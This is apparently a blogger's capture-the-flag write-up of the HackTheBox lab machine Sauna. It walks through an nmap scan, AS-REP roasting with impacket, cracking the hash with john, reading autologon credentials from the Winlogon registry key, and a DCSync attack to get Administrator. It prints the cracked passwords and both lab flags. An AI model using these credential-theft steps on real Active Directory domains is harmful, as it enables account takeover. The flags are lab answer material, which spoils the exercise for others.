Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Sauna
|htbmachinesretired|

Summary

Sauna,a Windows box created by HackTheBox user egotisticalSW, was an overall easy difficulty box.The initial enumeration expose some Names using which we can create some username list.Using impacket GetNPUsers.py we expose valid user and hash . using that we can use evil-winrm to get a shell as user. Enumerating and looking in the Registry we see a password for a service account using that we can get a shell as the Service.We see that svc_loanmgr has permission to DCSync so using that we can do use impacket secretdump.py to dump Administrator Credentials and use psexec to get shell as Administrator.

Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Nmap 7.80 scan initiated Sat Feb 15 14:02:02 2020 as: nmap -sC -sV -oN nmap/sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.15s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-16 03:02:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/15%Time=5E484042%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-02-16T03:04:16
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 15 14:06:53 2020 -- 1 IP address (1 host up) scanned in 290.71 seconds

Lets start with web the only interesting thing we see is in about page as the names of the team.

using the above name i created a list of users as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
jenny.joy
j.joy
joy.jenny
jenny.j
j.jenny
jennyjoy
jjoy
joyjenny
jennyj
jjenny
jenny-joy
joy-jenny
jenny-j
j-jenny
james.doe
j.doe
doe.james
james.d
d.james
jamesdoe
jdoe
doejames
jamesd
djames
james-doe
doe-james
james-d
d-james
fergus.smith
f.smith
smith.fergus
fergus.s
s.fergus
fergussmith
fsmith
smithfergus
ferguss
sfergus
sauna
johnson
watson
fergus-smith
smith-fergus
fergus-s
s-fergus
shaun.coins
s.coins
coins.shaun
shaun.c
c.shaun
shauncoins
scoins
coinsshaun
shaunc
cshaun
shaun-coins
coins-shaun
shaun-c
c-shaun
sophie.driver
s.driver
driver.sophie
sophie.d
d.sophie
sophiedriver
sdriver
driversophie
sophied
dsophie
bowie.taylor
b.taylor
taylor.bowie
bowie.t
t.bowie
hugo.bear
h.bear
bear.hugo
hugo.b
b.hugo
steven.kerb
s.kerb
kerb.steven
steven.k
k.steven
bowietaylor
btaylor
taylorbowie
bowiet
tbowie
hugobear
hbear
bearhugo
hugob
bhugo
stevenkerb
skerb
kerbsteven
stevenk
ksteven

User

Using the list I tried to use GetNPUsers.py to try to get valid user and its hash

1
python GetNPUsers.py EGOTISTICALBANK/ -usersfile users.lst -format john -dc-ip 10.10.10.175

And we get a hit on fsmith as it was vulnerable to ASREProast and a hash for that using john to crack the password as

1
john --wordlist=/usr/share/wordlists/rockyou.txt testhash

and we get a valid creds as fsmith:Thestrokes23

using which we can get a shell as fsmith

and read user.txt as 1b5520b98d97cf17f24122a55baf70cf

Privilege Escalation

Enumerating User and looking for any other user we find another user as svc_loanmgr
in net user

looking for password for that user i looked in payloadallthethings

and used RegistryLookup

to get DefaultPassword

1
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Which expose the password as Moneymakestheworldgoround!

Now using the above credential we see that svc_loanmgr have access to DCSync

So using impacket secretdump.py

and using that on psexec

and we can grab root.txt

and we have root.txt f3ee04965c68257382e31502cc5e881f

and we have pwned Sauna 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/sauna/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxeasywindowsimpacketsvc_loanmgrpsexec